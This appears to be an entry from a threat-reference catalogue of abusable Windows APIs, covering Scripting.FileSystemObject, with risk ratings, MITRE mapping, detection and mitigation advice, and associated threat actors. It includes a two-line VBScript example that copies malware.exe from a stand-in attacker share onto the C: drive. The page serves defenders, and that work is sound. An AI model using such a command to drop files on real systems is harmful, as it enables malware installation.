LOLAPI
Back to API Browser

Scripting.FileSystemObject COM Object

⚠️ High Risk📁 Windows Com Api🏷️ file operations✅ Verified
#windows-com-api#file-operations#script

🔧 API Details

Namespace

Scripting.FileSystemObject

Language

VBScript/JavaScript

Official Documentation

https://learn.microsoft.com/en-us/windows/win32/wmi_snmp/scripting-filesystemobject

📊 Risk Assessment

Severity

High

Prevalence

widespread

Ease of Abuse

easy

Likelihood in Real Attacks

80%

🎯 MITRE ATT&CK Techniques

T1566.001

Click to view on MITRE ATT&CK

Abuse Scenarios

Malware distribution via script

Technique: T1566.001

🚨 Common in Campaigns

Download and write malware files to disk

Code Example:

Set fso = CreateObject("Scripting.FileSystemObject")
fso.CopyFile "\\\\attacker\\\\malware.exe", "C:\\malware.exe", True
Detection Difficulty: Easy

🔍 Detection Strategies

Sysmon

HIGH Effectiveness

Monitor file creation from script engines

File Integrity Monitoring

HIGH Effectiveness

Detect unauthorized file creation/modification

🛡️ Mitigation Strategies

policy

HIGH Feasibility

Disable Windows Script Host and VBScript

🕵️ Threat Intelligence

👥 APT Groups / Threat Actors

APT1

Lazarus

🦠 Malware Families

Emotet

IcedID

🔨 Tools

Custom scripts

📋 Metadata

API ID

93bb263d-30ea-43a7-b9bd-a3ca9744bd9a

Created

2026-02-02

Author

Claw